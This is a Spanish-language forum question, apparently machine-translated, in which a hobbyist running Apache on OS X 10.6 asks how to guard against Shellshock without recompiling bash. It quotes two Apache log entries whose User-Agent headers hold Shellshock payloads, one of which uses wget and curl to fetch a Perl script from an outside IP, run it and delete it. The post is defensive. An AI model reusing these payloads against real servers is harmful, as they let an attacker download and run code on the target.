Estoy ejecutando un pequeño servidor HTTP (Apache) fuera de mi Mac en su mayoría como un hobby. Si se pone en peligro no es el fin del mundo pero es algo que me gustaría evitar. He creado un launchctl trabajo para comprobar el archivo de registro de Apache para posibles solicitudes relacionadas con Shellshock y anoche recibí dos entradas relacionadas:
82.221.128.246 - - [29/Sep/2014:08:14:41 -0400] "GET / HTTP/1.1" 200 2081 "-" "() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\""
173.45.100.18 - - [29/Sep/2014:00:52:07 -0400] "GET /cgi-bin/hi HTTP/1.0" 404 208 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
El primero parece inofensivo y la IP de los hosts de una muy legítima sitio web de aspecto afirmando que sus peticiones son únicamente para fines de investigación. La segunda es una historia diferente aunque, intenta descargar y ejecutar un script en Perl. Afortunadamente no tengo instalado wget por lo que este ataque no funciona, pero parece que es sólo una cuestión de tiempo antes de que yo reciba una petición como esta, que hace un poco de daño.
Apple acaba de lanzar parches para OS X 10.7 y último pero por desgracia estoy corriendo 10.6. Lo simple y confiable medidas puedo tomar (es decir, no volver a compilar bash) para reducir los riesgos?